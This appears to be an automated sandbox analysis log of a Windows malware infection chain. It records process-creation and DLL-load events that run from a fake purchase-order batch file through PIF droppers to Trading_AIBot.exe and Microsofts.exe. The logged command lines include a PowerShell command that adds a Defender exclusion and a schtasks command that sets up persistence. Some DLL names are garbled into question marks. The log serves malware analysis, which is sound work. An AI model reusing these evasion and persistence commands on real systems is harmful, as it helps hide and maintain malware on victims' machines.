                      Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknown Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: unknown Process created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: version.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: vbscript.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: msxml3.dll
                      Source: C:\Windows\System32\cscript.exe Section loaded: msdart.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: url.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieframe.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wkscli.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: smartscreenps.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttpcom.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: webio.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: mscoree.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: version.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: edputil.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: urlmon.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: srvcli.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: appresolver.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: bcp47langs.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: slc.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe  Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
